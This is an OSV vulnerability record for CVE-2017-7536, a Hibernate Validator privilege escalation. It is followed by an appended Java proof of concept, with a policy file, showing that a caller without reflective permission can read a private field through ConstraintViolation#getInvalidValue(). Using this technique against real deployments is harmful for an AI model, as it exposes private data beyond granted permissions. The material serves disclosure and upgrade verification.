{
  "id": "CVE-2017-7536",
  "details": "In Hibernate Validator 5.2.x before 5.2.5.Final, 5.3.x before 5.3.6.Final, and 5.4.x before 5.4.2.Final, it was found that when the security manager's reflective permissions, which allow it to access the private members of a class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without holding the permission itself, an attacker may be able to validate an invalid instance and read the private member value via ConstraintViolation#getInvalidValue().",
  "aliases": ["GHSA-xxgp-pcfc-3vgc"],
  "modified": "2026-04-10T04:00:56.733487Z",
  "published": "2018-01-10T15:29:00.283Z",
  "references": [
    {"type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:2741"},
    {"type": "ADVISORY", "url": "http://www.securitytracker.com/id/1039744"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:2808"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:2810"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:3141"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:3458"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:2740"},
    {"type": "ADVISORY", "url": "http://www.securityfocus.com/bid/101048"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:2811"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:3454"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:2742"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:2809"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:3456"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:2927"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2017:3455"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:2743"},
    {"type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2018:3817"},
    {"type": "REPORT", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1465573"}
  ],
  "affected": [
    {
      "ranges": [
        {
          "type": "GIT",
          "repo": "https://github.com/hibernate/hibernate-validator",
          "events": [
            {"introduced": "a93f900f0f91bdfccf98a1825d7cfbd85b8a6c85"},
            {"fixed": "9a8ee4954d9d6596f0bd87fd66d51deac81724d1"},
            {"introduced": "a3fa9cee819a8e85ab99e8106c434e175b9d5a3b"},
            {"fixed": "be5f102e7c9eba64e58b93763befde4284ce9e67"},
            {"introduced": "b9b5ee347e9231271029561ac8cddab00519e484"},
            {"fixed": "134a5bddddc15559cc8557ef6c91e8d6d7ff3d08"},
            {"introduced": "0"},
            {"last_affected": "d805da5686ba8083a858939595347da922c11a8b"},
            {"introduced": "0"},
            {"last_affected": "7642f2628e411bb0e414ad50ed6d4461d6d0715d"},
            {"introduced": "0"},
            {"last_affected": "9f35cfaffe42bbf442040172538b54f90be817d8"},
            {"introduced": "0"},
            {"last_affected": "9f35cfaffe42bbf442040172538b54f90be817d8"}
          ],
          "database_specific": {
            "versions": [
              {"introduced": "5.2.0"},
              {"fixed": "5.2.5"},
              {"introduced": "5.3.0"},
              {"fixed": "5.3.6"},
              {"introduced": "5.4.0"},
              {"fixed": "5.4.2"},
              {"introduced": "0"},
              {"last_affected": "6.0.0"},
              {"introduced": "0"},
              {"last_affected": "7.0"},
              {"introduced": "0"},
              {"last_affected": "4.0"},
              {"introduced": "0"},
              {"last_affected": "4.0"}
            ]
          }
        }
      ],
      "versions": [
        "4.0.0.GA",
        "5.2.0.Final", "5.2.1.Final", "5.2.2.Final", "5.2.3.Final", "5.2.4.Final",
        "5.3.0.Alpha1", "5.3.0.Final", "5.3.1.Final", "5.3.2.Final", "5.3.3.Final", "5.3.4.Final", "5.3.5.Final",
        "5.4.0.Final", "5.4.1.Final",
        "6.0.0.Alpha1", "6.0.0.Alpha2", "6.0.0.Beta1", "6.0.0.Beta2", "6.0.0.CR1", "6.0.0.CR2", "6.0.0.CR3",
        "6.0.0.Final", "6.0.1.Final", "6.0.2.Final", "6.0.3.Final", "6.0.4.Final", "6.0.5.Final", "6.0.6.Final",
        "6.0.7.Final", "6.0.8.Final", "6.0.9.Final",
        "6.1.0.Alpha1", "6.1.0.Alpha2", "6.1.0.Alpha3", "6.1.0.Alpha4", "6.1.0.Alpha5", "6.1.0.Alpha6",
        "6.1.0.Final", "6.1.1.Final", "6.1.2.Final",
        "7.0.0.Alpha1", "7.0.0.Alpha2", "7.0.0.Alpha3", "7.0.0.Alpha4", "7.0.0.Alpha5", "7.0.0.Alpha6",
        "7.0.0.CR1", "7.0.0.Final"
      ],
      "database_specific": {
        "unresolved_ranges": [
          {"events": [{"introduced": "0"}, {"last_affected": "6.4"}]},
          {"events": [{"introduced": "0"}, {"last_affected": "6.4"}]},
          {"events": [{"introduced": "0"}, {"last_affected": "6.4.0"}]},
          {"events": [{"introduced": "0"}, {"last_affected": "7.1"}]}
        ],
        "source": "https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2017-7536.json"
      }
    }
  ],
  "schema_version": "1.7.5",
  "severity": [
    {"type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}
  ]
}
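The escalation path the record describes, as an added example that is not part of the OSV record or of the Hibernate Validator project: a caller that is denied java.lang.reflect.ReflectPermission "suppressAccessChecks" by the SecurityManager cannot read a private field directly, but can hand the same object to an affected Hibernate Validator (5.4.1.Final is assumed below), validate it, and recover the private value from ConstraintViolation#getInvalidValue(). The class names (UntrustedReader, DbCredentials), the "hunter2" sample secret, the jar paths and the policy file are all assumptions made for this example; the exact permissions the application grant needs for bootstrapping may differ on your stack and can be adjusted without affecting the point.

```java
// Added example, not from the OSV record or the Hibernate Validator project.
// Assumed layout (hypothetical paths):
//   /opt/hv-demo/lib/      hibernate-validator-5.4.1.Final.jar, validation-api-1.1.0.Final.jar,
//                          jboss-logging-3.x.jar, classmate-1.x.jar
//   /opt/hv-demo/classes/  this class, compiled
//
// Assumed policy file /opt/hv-demo/hv-demo.policy (written for this example):
//   grant codeBase "file:/opt/hv-demo/lib/-" {
//       permission java.security.AllPermission;          // "reflective permissions granted to Hibernate Validator"
//   };
//   grant codeBase "file:/opt/hv-demo/classes/" {
//       permission java.util.PropertyPermission "*", "read";
//       permission java.lang.RuntimePermission "getClassLoader";
//       // deliberately NO java.lang.reflect.ReflectPermission "suppressAccessChecks"
//   };
//
// Run on Java 8 (the SecurityManager is deprecated in later JDKs):
//   java -Djava.security.manager -Djava.security.policy=/opt/hv-demo/hv-demo.policy \
//        -cp "/opt/hv-demo/classes:/opt/hv-demo/lib/*" UntrustedReader

import java.lang.reflect.Field;
import java.util.Set;

import javax.validation.ConstraintViolation;
import javax.validation.Validation;
import javax.validation.Validator;
import javax.validation.constraints.Size;

public class UntrustedReader {

    /** Stand-in for a trusted bean: the secret is private and has no getter. */
    public static class DbCredentials {
        // Constraint declared by the bean's own author. A short value makes the
        // instance "invalid", which is the precondition the advisory names.
        @Size(min = 12, message = "password too short")
        private final String password;

        public DbCredentials(String password) {
            this.password = password;
        }
    }

    /** Path 1: direct reflection. setAccessible(true) triggers the SecurityManager
     *  check for ReflectPermission "suppressAccessChecks" against this caller. */
    static String readViaReflection(Object target) {
        try {
            Field f = target.getClass().getDeclaredField("password");
            f.setAccessible(true);
            return (String) f.get(target);
        } catch (SecurityException e) {
            return "DENIED: " + e.getMessage();
        } catch (ReflectiveOperationException e) {
            return "ERROR: " + e;
        }
    }

    /** Path 2: the same caller asks Hibernate Validator to validate the object.
     *  The validator reads the private field with its own (privileged) reflection
     *  and reports the value back through getInvalidValue(). */
    static String readViaValidator(Object target) {
        Validator validator = Validation.buildDefaultValidatorFactory().getValidator();
        Set<ConstraintViolation<Object>> violations = validator.validate(target);
        if (violations.isEmpty()) {
            return "no violations";
        }
        StringBuilder out = new StringBuilder();
        for (ConstraintViolation<Object> v : violations) {
            out.append(v.getPropertyPath()).append(" = ").append(v.getInvalidValue()).append(' ');
        }
        return out.toString().trim();
    }

    public static void main(String[] args) {
        // Constructed sample secret; violates @Size(min = 12) so a violation is guaranteed.
        Object creds = new DbCredentials("hunter2");
        System.out.println("reflection: " + readViaReflection(creds));
        System.out.println("validator : " + readViaValidator(creds));
    }
}
```

On an affected version the first line reports the access-denied SecurityException and the second line still prints the private field's value, which is the escalation the record describes: the caller never held the reflective permission, Hibernate Validator did. A practical check after upgrading to 5.2.5.Final, 5.3.6.Final or 5.4.2.Final is to re-run the same program under the same policy; if the private value still comes back to a caller without the permission, the deployed jar is not the fixed one.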